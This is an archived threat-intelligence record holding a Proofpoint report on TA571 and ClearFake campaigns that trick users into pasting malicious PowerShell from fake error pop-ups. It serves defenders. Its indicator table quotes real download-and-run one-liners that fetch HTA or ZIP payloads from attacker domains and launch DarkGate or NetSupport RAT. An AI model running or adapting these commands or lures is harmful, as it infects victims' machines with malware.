{ "id": "8335f492-b6c2-4ae4-985d-9181dc0584b6", "created_at": "2026-04-06T00:22:15.387378Z", "updated_at": "2026-04-10T13:12:59.637005Z", "deleted_at": null, "sha1_hash": "0e8b6a39651dc35e0d28ea9b6ad5864d217dd611", "title": "Clipboard to Compromise: PowerShell Script Self-Pwn | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2275704, "plain_text": "Clipboard to Compromise: PowerShell Script Self-Pwn |\r\nProofpoint US\r\nBy Tommy Madjar, Dusty Miller, Selena Larson and the Proofpoint Threat Research Team\r\nPublished: 2024-06-13 · Archived: 2026-04-05 14:48:40 UTC\r\nKey findings \r\nProofpoint researchers identified an increasingly popular technique leveraging unique social engineering to\r\nrun PowerShell and install malware.\r\nResearchers observed TA571 and the ClearFake activity cluster use this technique.\r\nAlthough the attack chain requires significant user interaction to be successful, the social engineering is\r\nclever enough to present someone with what looks like a real problem and solution simultaneously, which\r\nmay prompt a user to take action without considering the risk.\r\nOverview \r\nProofpoint has observed an increase in a technique leveraging unique social engineering that directs users to copy\r\nand paste malicious PowerShell scripts to infect their computers with malware. Threat actors including initial\r\naccess broker TA571 and at least one fake update activity set are using this method to deliver malware including\r\nDarkGate, Matanbuchus, NetSupport, and various information stealers.  \r\nWhether the initial campaign begins via malspam or delivered via web browser injects, the technique is similar.\r\nUsers are shown a popup textbox that suggests an error occurred when trying to open the document or webpage,\r\nand instructions are provided to copy and paste a malicious script into the PowerShell terminal, or the Windows\r\nRun dialog box to eventually run the script via PowerShell.  \r\nProofpoint has observed this technique as early as 1 March 2024 by TA571, and in early April by the ClearFake\r\ncluster, as well as  in early June by both clusters. \r\nCampaign Details \r\nClearFake example \r\nOur researchers first observed this technique with the ClearFake campaign in early April and we have observed it\r\nused in every ClearFake campaign since then. ClearFake is a fake browser update activity cluster that\r\ncompromises legitimate websites with malicious HTML and JavaScript.  \r\nIn observed campaigns, when a user visited a compromised website, the injection caused the website to load a\r\nmalicious script hosted on the blockchain via Binance’s Smart Chain contracts, a technique known as\r\n\"EtherHiding\". The initial script then loaded a second script from a domain that used Keitaro TDS for filtering. If\r\nthis second script loaded and passed various checks, and if the victim continued to browse the website, they were\r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 1 of 12\n\npresented with a fake warning overlay on the compromised website. This warning instructed them to install a\r\n\"root certificate\" to view the website correctly.  \r\nMalicious fake warning instructing recipients to copy a PowerShell script and run it in the PowerShell Terminal. \r\nThe message included instructions to click a button to copy a PowerShell script and then provided steps on how to\r\nmanually run this script on the victim's computer. If the instructions were followed, the user executed the\r\nPowerShell by pasting it into the PowerShell command line interface window.  \r\nIn campaigns in May, we observed the following chain: The script performed various functions including flushing\r\nthe DNS cache, removing clipboard content, displaying a decoy message to the user, and downloading a remote\r\nPowerShell script and execute it in-memory. The second PowerShell script was essentially used to download yet\r\nanother PowerShell script. This third PowerShell script obtained system temperatures via WMI and, if no\r\ntemperature was returned as in the case of many virtual environments and sandboxes, exited the script. However,\r\nif it continued, it led to a fourth AES-encrypted PowerShell script that downloaded a file named “data.zip” and\r\nextracted the contents to find and execute any .exe files, and then reported back to the ClearFake C2 that the\r\ninstallation was completed. \r\nThe threat actor used ZIP’s ability to contain any executable and bundled various legitimate, signed executables\r\nthat side-loaded a trojanized DLL. This DLL used DOILoader (also known as IDAT Loader or HijackLoader) to\r\nload Lumma Stealer from an encrypted file, also included in the downloaded ZIP file. \r\nLumma Stealer then, in addition to performing the stealer activities, downloaded three distinctive payloads: \r\nam.exe – Amadey Loader \r\nma.exe – A downloader that downloaded and ran the XMRig crypto currency miner with a specific\r\nconfiguration \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 2 of 12\n\ncl.exe – A clipboard hijacker designed to replace cryptocurrency addresses in the clipboard, constructed to\r\ncause the victim to transfer cryptocurrency to a threat actor-controlled address instead of the intended\r\naddress when doing transfers \r\nAmadey was observed to download other payloads, for example a Go-based malware believed to be JaskaGO.\r\nThis means that in total, five distinct malware families could be executed just by running the one initial\r\nPowerShell script. \r\nExample ClearFake attack chain.  \r\nThe curious case of ClickFix \r\nIn mid-April 2024, researchers found compromised sites containing an inject leading to an iframe on pley[.]es.\r\nThis iframe was shown as an overlay error message claiming that a faulty browser update needed to be fixed.\r\nResearchers dubbed this activity cluster ClickFix. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 3 of 12\n\nClickFix error message per 11 May 2024. \r\nThe error message asked the victim to open “Windows PowerShell (Admin)” (which will open an UAC prompt)\r\nand then right-click to paste the code. If this was done, PowerShell would run another remote PowerShell script\r\nthat would download and run an executable, eventually leading to Vidar Stealer. However, just a few days later,\r\nafter discovery, the payload domain used in the PowerShell was taken offline. Thus, despite the error being\r\ndisplayed on compromised websites, it could not lead to an infection. \r\nAfter a few days of this semi-functional state, 15 May 2024, the custom content of the iframe was replaced with\r\nthe ClearFake inject. It is still serving this inject in early June 2024. As the pley[.]es domain itself seems to be\r\ncompromised, it’s unclear if these two activity sets – ClearFake and ClickFix – started to work with each other, or\r\nif the ClearFake actor re-compromised the iframe, replacing the code with its own content. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 4 of 12\n\nExtract from custom iframe content on 11 May 2024. \r\niframe content as on 07 June 2024. \r\nTA571 examples \r\nProofpoint first observed TA571’s use of this technique in a campaign on 01 March 2024. The campaign included\r\nover 100,000 messages and targeted thousands of organizations globally.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 5 of 12\n\nTA571 email lure.  \r\nIn this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word.  \r\nThe page also displayed an error message that said the “‘Word Online’ extension is not installed,” and presented\r\ntwo options to continue: “How to fix” and “Auto-fix”. \r\nHTML attachment containing instructions on how to copy and paste PowerShell that leads to the installation of\r\nmalware. \r\nClicking the “How to fix” button copied a base64-encoded PowerShell command to the computer’s clipboard, and\r\nthe message on the page changed to instruct the target to open a PowerShell terminal and right-click the console\r\nwindow. Right clicking a terminal window pasted the content of the clipboard and executed the PowerShell.\r\nProofpoint observed two different PowerShell commands in these files: one that downloaded and executed an MSI\r\nfile, and one that downloaded and executed a VBS script. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 6 of 12\n\nIf the “Auto-fix” button was clicked, the search-ms protocol displayed a similar WebDAV-hosted “fix.msi” or\r\n“fix.vbs” in Windows Explorer. \r\nWhen executed, the MSI ran a bundled DLL, “Inkpad3.dll”, with the LOLBAS command “msiexec -z”. This\r\ncommand ran the DllUnregisterServer function of the DLL, which dropped and executed another DLL,\r\n“Inkpad_honeymoon.msp”. This led to the installation of Matanbuchus. If the VBS was executed, it used\r\nPowerShell to download and execute DarkGate. \r\nProofpoint observed TA571 use similar attack chains in campaigns throughout the spring, using various visual\r\nlures and varying between instructing the victim to either open the PowerShell terminal or using the Run dialog\r\nbox by pressing the Windows button+R. The actor also removed wording that refers to copy/paste, abusing the\r\nfact that the victim doesn’t need to know that something is copied to the clipboard. Some recent examples: \r\nOn 27 May 2024, TA571 used an HTML attachment that appeared to display a document hosted on OneDrive and\r\ncontained a fake error message.  \r\nHTML attachment purporting to be a document hosted on OneDrive containing a “How to fix” button.  \r\nIf the “How to fix” button was clicked, it copied a PowerShell script to the clipboard and provided instructions to\r\nthe user on how to run it. This attack chain ultimately led to the installation of DarkGate malware.   \r\nTA571 continues to modify and update its lures and attack chains while using the PowerShell clipboard technique.\r\nOn 28 May 2024, Proofpoint identified a TA571 campaign using HTML attachments that used a different error\r\nmessage. Notably, this campaign included instructions for the victim to click the \"Fix\" button to \"install the root\r\ncertificate”, which is language that ClearFake error messages used. In this campaign, TA571 asked the victim to\r\nuse the Run dialogue box to run the malicious script instead of the PowerShell terminal. The TA571 campaign\r\ncontained at least two different command lines running different PowerShell scripts, one leading to DarkGate via a\r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 7 of 12\n\ndownloaded HTA-file that ran another PowerShell script and one leading to NetSupport RAT via a downloaded\r\nZIP file. \r\nIn most of the campaigns, TA571 also padded the HTML files with various random content, creating semi-unique\r\nhashes for the attachments. \r\nExample of the new TA571 lure containing similar language to ClearFake. \r\nCommon techniques \r\nIn all cases, both via the fake updates or the HTML attachments, the malicious PowerShell/CMD script is copied\r\nto the clipboard via browser-side JavaScript, commonly used on legitimate sites too. The malicious content is\r\ncontained in the HTML/website in various places, and encoded in several ways, such as double-Base64, reverse\r\nBase64 or even clear text in various elements and functions. The legitimate use, and the many ways to store the\r\nmalicious code, and the fact that the victim manually runs the malicious code without any direct association with a\r\nfile, makes detection for these types of threats difficult. As antivirus software and EDRs will have issues\r\ninspecting clipboard content, detection and blocking needs to be in place prior to the malicious HTML/site being\r\npresented to the victim.  \r\nAs for the difference between asking the victim to run the malicious code either via the PowerShell terminal, or\r\nvia the Run dialogue box, they have various issues. For example, using the PowerShell terminal, the user must\r\nperform more steps to open it. However, once there, it is enough to right click once, and the code will\r\nautomatically be pasted and executed, without letting the victim review the code first. When it comes to the Run\r\ndialogue box, the whole process can be done with four clicks/button combinations: click the button, Ctrl+R to\r\nopen the dialogue, Ctrl+V to paste the code, and enter to run the code. However, with this method the victim\r\nmight have second thoughts when seeing the code being pasted and might press cancel instead of running it. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 8 of 12\n\nAttribution \r\nTA571 is a spam distributor, and this actor sends high volume email campaigns to deliver and install a variety\r\nmalware for their cybercriminal customers, depending on the subsequent operator’s objectives. Proofpoint\r\nassesses with high confidence that TA571 infections can lead to ransomware.   \r\nClearFake is not currently attributed to a tracked threat actor.  \r\nWhile it’s clear that both actors are borrowing ideas from each other, Proofpoint does not associate them with each\r\nother in any other way. \r\nConclusion \r\nThis attack chain requires significant user interaction to be successful. The social engineering in the fake error\r\nmessages is clever and purports to be an authoritative notification coming from the operating system. It also\r\nprovides both the problem and a solution so that a viewer may take prompt action without pausing to consider the\r\nrisk. The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat\r\nactors adopting new, varied, and increasingly creative attack chains – including improving social engineering,\r\nnested PowerShell, and the use of WebDAV and SMB – to enable malware delivery.  \r\nOrganizations should train users to identify the activity and report suspicious activity to their security teams. This\r\nis very specific training but can easily be integrated into an existing user training program.  \r\nEmerging Threats signatures\r\nThe Emerging Threats ruleset contains detections for the malware identified in these campaigns.  \r\nExample indicators of compromise  \r\nThe following is not an exhaustive list of IOCs, but a sample observed in recent campaigns. \r\nIndicator  Description \r\nDate\r\nObserved \r\nrechtsanwalt@ra-silberkuhl[.]com \r\nTA571\r\ncampaign\r\nreply-to\r\nemail \r\n28 May\r\n2024 \r\n9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1  TA571\r\nHTML\r\nAttachment\r\n28 May\r\n2024 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 9 of 12\n\nExample\r\nHash \r\nhxxps://cdn3535[.]shop/1[.]zip \r\nTA571\r\nclipboard\r\npayload\r\n(NetSupport\r\nRAT) \r\n28 May\r\n2024 \r\nhxxps://lashakhazhalia86dancer[.]com/c[.]txt \r\nTA571\r\nclipboard\r\npayload\r\n(DarkGate) \r\n28 May\r\n2024 \r\nhxxp://languangjob[.]com/pandstvx \r\nTA571 HTA\r\npayload\r\n(DarkGate) \r\n28 May\r\n2024 \r\nhxxp://languangjob[.]com/pandstvx \r\nTA571\r\nPowerShell\r\npayload\r\n(DarkGate) \r\n28 May\r\n2024 \r\ncmd /c start /min powershell invoke-webrequest -uri\r\nhxxps://lashakhazhalia86dancer[.]com/c.txt -outfile c:\\users\\public\\default.hta;\r\nstart-process c:\\users\\public\\default.hta; \r\nTA571\r\nClipboard to\r\nDarkGate \r\n28 May\r\n2024 \r\ncmd /c start /min powershell\r\n$st='c:\\\\users\\\\public';$om=$st+'\\\\start.zip';$ps=$st+'\\\\client\\\\client32.exe';invoke-webrequest -uri hxxps://cdn3535[.]shop/1.zip -outfile $om;expand-archive $om\r\n$st; start-process $ps;Set-Clipboard -Value ' ';exit; \r\nTA571\r\nClipboard to\r\nNetSupport \r\n28 May\r\n2024 \r\n07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80  TA571\r\nHTML\r\nAttachment\r\n27 May\r\n2024 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 10 of 12\n\nExample\r\nHash \r\nhxxps://kostumn1[.]ilabserver[.]com/1.zip \r\nTA571\r\nPowerShell\r\nPayload\r\nURL \r\n27 May\r\n2024 \r\n91.222.173[.]113 \r\nDarkGate\r\nC2 \r\n27 May\r\n2024 \r\nhxxp://mylittlecabbage[.]net/qhsddxna \r\nTA571\r\nPayload\r\nURL \r\n17 May\r\n2024 \r\nhxxp://mylittlecabbage[.]net/xcdttafq \r\nTA571\r\nPayload\r\nURL \r\n17 May\r\n2024 \r\nhxxps://jenniferwelsh[.]com/header.png \r\nTA571\r\nPayload\r\nURL \r\n17 May\r\n2024 \r\ncmd /c start /min powershell $Id = 'c:\\users\\public\\or.hta';invoke-webrequest -uri\r\nhxxps://jenniferwelsh[.]com/header.png -outfile $Id;start-process $Id;Set-Clipboard -Value ' ';exit;== \r\nTA571\r\nClipboard to\r\nDarkGate \r\n17 May\r\n2024 \r\nmylittlecabbage[.]net \r\nDarkGate\r\nC2 \r\n17 May\r\n2024 \r\nhxxps://rtattack[.]baqebei1[.]online/df/tt \r\nClearFake\r\nPowerShell\r\nPayload \r\n14 May\r\n2024 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 11 of 12\n\nhxxps://oazevents[.]com/loader[.]html \r\nClickFix\r\nPowerShell\r\nPayload\r\nURL \r\n11 May\r\n2024 \r\n11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f \r\nTA571\r\nHTML\r\nAttachment\r\nExample\r\nHash \r\n1 March\r\n2024 \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn" ], "report_names": [ "clipboard-compromise-powershell-self-pwn" ], "threat_actors": [ { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d9b39228-0d9d-4c1e-8e39-2de986120060", "created_at": "2023-01-06T13:46:39.293127Z", "updated_at": "2026-04-10T02:00:03.277123Z", "deleted_at": null, "main_name": "BelialDemon", "aliases": [ "Matanbuchus" ], "source_name": "MISPGALAXY:BelialDemon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7183913d-9a43-4362-96e1-9af522b6ab84", "created_at": "2024-06-19T02:00:04.377344Z", "updated_at": "2026-04-10T02:00:03.653777Z", "deleted_at": null, "main_name": "TA571", "aliases": [], "source_name": "MISPGALAXY:TA571", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434935, "ts_updated_at": 1775826779, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0e8b6a39651dc35e0d28ea9b6ad5864d217dd611.pdf", "text": "https://archive.orkl.eu/0e8b6a39651dc35e0d28ea9b6ad5864d217dd611.txt", "img": "https://archive.orkl.eu/0e8b6a39651dc35e0d28ea9b6ad5864d217dd611.jpg" } }